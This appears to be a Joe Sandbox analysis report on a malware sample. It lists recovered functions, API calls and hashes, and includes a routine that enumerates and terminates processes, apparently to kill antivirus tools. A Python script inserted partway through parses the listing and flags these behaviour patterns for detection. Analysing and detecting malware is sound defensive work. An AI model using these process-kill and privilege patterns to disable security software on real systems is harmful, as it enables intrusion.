                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 5dafc25f1a4052095e555d496f848ccaf7587dfebe6a626f0f4d3c4bd95eb74c
                                                      • Instruction ID: ee83a6458644a06cb91ab24b03bf46d7ce71b92dc326c9c37c99e796efeb41be
                                                      • Opcode Fuzzy Hash: 5dafc25f1a4052095e555d496f848ccaf7587dfebe6a626f0f4d3c4bd95eb74c
                                                      • Instruction Fuzzy Hash: 53A17C30701222CFCB29EF54D995A29F765FF14700F5142ADF90AAB261CB31AD66CF91
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0017B13A), ref: 0017B078
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 60d666de31c5bd9f2aa935c1f35d806ee8700f58499e2bc678f22dd4e2369993
                                                      • Instruction ID: ddd1d87e8cf46b609f6cbd253ec11b12eeb1275369d8d4c36a3e09a30a231586
                                                      • Opcode Fuzzy Hash: 60d666de31c5bd9f2aa935c1f35d806ee8700f58499e2bc678f22dd4e2369993
                                                      • Instruction Fuzzy Hash: 4491A770A04605EACB18EFA0C481BEEFB75BF54304F94C11AE96EA7251DF30A959CB91
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 0012327E
                                                        • Part of subcall function 0012218F: GetClientRect.USER32(?,?), ref: 001221B8
                                                        • Part of subcall function 0012218F: GetWindowRect.USER32(?,?), ref: 001221F9
                                                        • Part of subcall function 0012218F: ScreenToClient.USER32(?,?), ref: 00122221
                                                      • GetDC.USER32 ref: 0015D073
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0015D086
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015D094
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015D0A9
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015D0B1
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0015D13C
                                                       Memory Dump Source
                                                       • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                        • Part of subcall function 00122714: GetCursorPos.USER32(?), ref: 00122727
                                                        • Part of subcall function 00122714: ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 001AC69C
                                                      • ImageList_EndDrag.COMCTL32 ref: 001AC6A2
                                                      • ReleaseCapture.USER32 ref: 001AC6A8
                                                      • SetWindowTextW.USER32(?,00000000), ref: 001AC752
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001AC765
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 001AC847
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019211C
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00192148
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0019218A
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0019219F
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001921AC
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001921DC
                                                      • InternetCloseHandle.WININET(00000000), ref: 00192223
                                                        • Part of subcall function 00192B4F: GetLastError.KERNEL32(?,?,00191EE3,00000000,00000000,00000001), ref: 00192B64
                                                        • Part of subcall function 00192B4F: SetEvent.KERNEL32(?,?,00191EE3,00000000,00000000,00000001), ref: 00192B79
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001B0980), ref: 00199412
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001B0980), ref: 00199446
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001995C0
                                                      • SysFreeString.OLEAUT32(?), ref: 001995EA
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      APIs
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00183B8A,?), ref: 00184BE0
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00183B8A,?), ref: 00184BF9
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 001852FB
                                                      • _wcscmp.LIBCMT ref: 00185315
                                                      • MoveFileW.KERNEL32(?,?), ref: 00185330
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001A8D24
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0015C638
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0015C65A
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0015C672
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0015C690
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0015C6B1
                                                      • DestroyIcon.USER32(00000000), ref: 0015C6C0
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0015C6DD
                                                      • DestroyIcon.USER32(?), ref: 0015C6EC
                                                        • Part of subcall function 001AAAD4: DeleteObject.GDI32(00000000), ref: 001AAB0D
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      APIs
                                                        • Part of subcall function 0017B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0017B54D
                                                        • Part of subcall function 0017B52D: GetCurrentThreadId.KERNEL32 ref: 0017B554
                                                        • Part of subcall function 0017B52D: AttachThreadInput.USER32(00000000,?,0017A23B,?,00000001), ref: 0017B55B
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A246
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0017A263
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0017A266
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A26F
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0017A28D
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0017A290
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A299
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0017A2B0
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0017A2B3
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0017915A,00000B00,?,?), ref: 001794E2
                                                      • HeapAlloc.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 001794E9
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0017915A,00000B00,?,?), ref: 001794FE
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0017915A,00000B00,?,?), ref: 00179506
                                                      • DuplicateHandle.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 00179509
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0017915A,00000B00,?,?), ref: 00179519
                                                      • GetCurrentProcess.KERNEL32(0017915A,00000000,?,0017915A,00000B00,?,?), ref: 00179521
                                                      • DuplicateHandle.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 00179524
                                                      • CreateThread.KERNEL32(00000000,00000000,0017954A,00000000,00000000,00000000), ref: 0017953E
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      Similarity
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: e8cdba7bcefd459ba3d3e82d99005090038fbc30f3ca7601749ddeb98268a301
                                                      • Instruction ID: a0eba5c253293aceeaab4f19465ab4e3bb754a74ebb05764800dcd26d55e44ed
                                                      • Opcode Fuzzy Hash: e8cdba7bcefd459ba3d3e82d99005090038fbc30f3ca7601749ddeb98268a301
                                                      • Instruction Fuzzy Hash: BB918D71A00219AFDF24DFA9C884FAEBBB8EF45714F10855EF515AB290D7709944CFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001A7449
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 001A745D
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001A7477
                                                      • _wcscat.LIBCMT ref: 001A74D2
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 001A74E9
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001A7517
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 0e6cdd9c474cad9de2b4c2ba41917deb601c255b28941b61fa292e0796f18596
                                                      • Instruction ID: 2c68b8587cac91625724b16c46b81eb2708b7d6e38b2927e2fea4b62161ecf97
                                                      • Opcode Fuzzy Hash: 0e6cdd9c474cad9de2b4c2ba41917deb601c255b28941b61fa292e0796f18596
                                                      • Instruction Fuzzy Hash: C9417075A04348AFEB219F64CC85FEE7BA8EF09350F10452AF985A72D1D7719E84CB50
                                                      APIs
                                                        • Part of subcall function 00184148: CreateToolhelp32Snapshot.KERNEL32 ref: 0018416D
                                                        • Part of subcall function 00184148: Process32FirstW.KERNEL32(00000000,?), ref: 0018417B
                                                        • Part of subcall function 00184148: CloseHandle.KERNEL32(00000000), ref: 00184245
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F08D
                                                      • GetLastError.KERNEL32 ref: 0019F0A0
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F0CF
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019F14C
                                                      • GetLastError.KERNEL32(00000000), ref: 0019F157
                                                      • CloseHandle.KERNEL32(00000000), ref: 0019F18C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: d4ab3733539ac1cfc0df6ec94679c14749cc490bc3529479bce6e98b39349600
                                                      • Instruction ID: 17cb6b1a6c81f9f4a2466240efb78119a9284ea5c6819e425d9bbd91e6ece2e4
                                                      • Opcode Fuzzy Hash: d4ab3733539ac1cfc0df6ec94679c14749cc490bc3529479bce6e98b39349600
                                                      • Instruction Fuzzy Hash: 2541BE31300201AFDB15EF64DC95F6EB7A5AFA4714F08842DF8069B2D2CB74A945CF95
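The entry above (Toolhelp32 snapshot, Process32FirstW, OpenProcess, TerminateProcess, with the string SeDebugPrivilege) is the routine behind the "Search for Antivirus process" signature in this report. When a listing like this runs to hundreds of entries, it is quicker to parse it than to read it. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the plain-text entry layout used on this page (an `APIs` header per function, call lines of the form `• Api.MODULE(args), ref: addr`, subcall lines prefixed with `Part of subcall function`, and the `String ID` field of the `Similarity` section), resolves `#N.WSOCK32` ordinals such as the `#17` that appears later in this listing to their export names, and applies a small rule set. The rule labels and the `RULES` table are this example's own, not Joe Sandbox signatures; the sample text is constructed from entries on this page.

```python
"""Parse a Joe Sandbox function listing (the plain-text entries on this page)
into per-function API sets and flag behavioural patterns across them.

Added example, not part of the Joe Sandbox report or its tooling. Assumes the
layout shown on this page: each entry opens with an 'APIs' header, calls look
like '• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F08D' or
'• Part of subcall function 00184148: CloseHandle.KERNEL32(00000000), ref: 00184245',
and the 'Similarity' section carries '• String ID: a$b$c'. RULES is an
illustrative rule set written for this page, not Joe Sandbox's signatures.
"""
import re
from dataclasses import dataclass, field

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[#\w@:]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
STRING_ID_RE = re.compile(r"•\s*String ID:\s*(?P<s>.*)")

# wsock32.dll exports these by fixed ordinal, which Joe Sandbox prints as
# '#N.WSOCK32'; only the socket I/O entries needed here are listed.
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 4: "connect", 13: "listen", 16: "recv",
                    17: "recvfrom", 19: "send", 20: "sendto", 23: "socket"}

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)    # (api, module, is_subcall, ref)
    strings: list = field(default_factory=list)  # strings referenced by the function

    def api_names(self):
        return {api for api, _mod, _sub, _ref in self.calls}

def resolve_api(api, mod):
    """Turn '#17' in WSOCK32 into 'recvfrom'; named imports pass through."""
    if api.startswith("#") and mod == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(api[1:]), api)
    return api

def parse_listing(text):
    """Split the listing into FunctionEntry objects, one per 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            section = line
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                cur.calls.append((resolve_api(m["api"], m["mod"]), m["mod"],
                                  m["sub"] is not None, m["ref"]))
        elif section == "Similarity":
            m = STRING_ID_RE.match(line)
            if m and m["s"]:
                cur.strings.extend(s for s in m["s"].split("$") if s)
    return entries

# label -> (APIs that must all appear, subcalls included; string that must appear)
RULES = {
    "kills processes found by enumeration":
        ({"CreateToolhelp32Snapshot", "Process32FirstW", "OpenProcess", "TerminateProcess"}, None),
    "references SeDebugPrivilege": (set(), "SeDebugPrivilege"),
    "connects to a registry (RegConnectRegistryW)": ({"RegConnectRegistryW"}, None),
    "receives datagrams on a socket": ({"recvfrom", "htons"}, None),
}

def match_rules(entry):
    names = entry.api_names()
    return [label for label, (apis, s) in RULES.items()
            if apis <= names and (s is None or s in entry.strings)]

# Constructed sample: two entries copied from this page's listing.
SAMPLE = """\
APIs
  • Part of subcall function 00184148: CreateToolhelp32Snapshot.KERNEL32 ref: 0018416D
  • Part of subcall function 00184148: Process32FirstW.KERNEL32(00000000,?), ref: 0018417B
  • Part of subcall function 00184148: CloseHandle.KERNEL32(00000000), ref: 00184245
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F08D
• GetLastError.KERNEL32 ref: 0019F0A0
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0019F14C
• CloseHandle.KERNEL32(00000000), ref: 0019F18C
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001972EB
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0019730C
• WSAGetLastError.WSOCK32(00000000), ref: 0019731F
• htons.WSOCK32(?,?,?,00000000,?), ref: 001973D5
"""

if __name__ == "__main__":
    for i, e in enumerate(parse_listing(SAMPLE)):
        print(i, sorted(e.api_names()), match_rules(e))
```

Subcall lines are folded into the calling entry on purpose: the termination routine here never calls CreateToolhelp32Snapshot itself, so a rule that looked only at direct calls would miss the enumerate-then-kill pattern. The rule table is deliberately small; extend it with the API sets of other entries on this page (for instance RegConnectRegistryW for remote registry access) rather than matching on single API names, which fire on benign GUI code as well.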
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0018357C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 1e2171b877e5a5410ec90f9b17590f06cd3a761cfd2d0fffa84600054a1d526d
                                                      • Instruction ID: 2e7142d7a49e2c642d4c4d752ba628a1c750d01d953c03f6a6844c1a5efa084f
                                                      • Opcode Fuzzy Hash: 1e2171b877e5a5410ec90f9b17590f06cd3a761cfd2d0fffa84600054a1d526d
                                                      • Instruction Fuzzy Hash: BB110A7164C356BEE7056B14ECD2C6A779CDF15F60F24002AFA30A62C1E7A46F405BA0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00184802
                                                      • LoadStringW.USER32(00000000), ref: 00184809
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0018481F
                                                      • LoadStringW.USER32(00000000), ref: 00184826
                                                      • _wprintf.LIBCMT ref: 0018484C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0018486A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00184847
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: ce4bd92175b5f81c4cbb61d4db132e595e6542f176c45aed67a3b5bdaabd2a3c
                                                      • Instruction ID: d6129b11a4600bc257e61ef801a6372a6fdacc3dea4c5d7405cf929f2fd9c90c
                                                      • Opcode Fuzzy Hash: ce4bd92175b5f81c4cbb61d4db132e595e6542f176c45aed67a3b5bdaabd2a3c
                                                      • Instruction Fuzzy Hash: 99014FF29002087FE712E7A49D89EF7736CEB0C300F400695B749E2041EB749E848B75
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetSystemMetrics.USER32(0000000F), ref: 001ADB42
                                                      • GetSystemMetrics.USER32(0000000F), ref: 001ADB62
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 001ADD9D
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001ADDBB
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001ADDDC
                                                      • ShowWindow.USER32(00000003,00000000), ref: 001ADDFB
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001ADE20
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 001ADE43
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 51e9acb5522ad509e89959a6d212fb578cde46c6754594672aa39f8b27782ca0
                                                      • Instruction ID: 50d09d4bf545cbc7895997363bf57e2c4359c2919b21b355c28e7f986c246aa1
                                                      • Opcode Fuzzy Hash: 51e9acb5522ad509e89959a6d212fb578cde46c6754594672aa39f8b27782ca0
                                                      • Instruction Fuzzy Hash: E5B1CB38600615EFDF14CF69D9C57AE7BB1FF05710F088069EC4A9EA99D730A990CBA0
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A044E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3479070676-0
                                                      • Opcode ID: 3fae74e8272d34c7d331adcc0761042aabf7518b46edd87cc43faec9ddfa0271
                                                      • Instruction ID: 7b3db51e5f6647e64b30895e659979c55eb4aa53065bcfdb9c5d74a2eeeb0fcf
                                                      • Opcode Fuzzy Hash: 3fae74e8272d34c7d331adcc0761042aabf7518b46edd87cc43faec9ddfa0271
                                                      • Instruction Fuzzy Hash: 28A19C30204201AFCB16EF64C891B6EBBF5BF99314F14891DF59A872A2DB31E955CF42
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 00122E9F
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000,000000FF), ref: 00122EE7
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 0015C55B
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 0015C5C7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
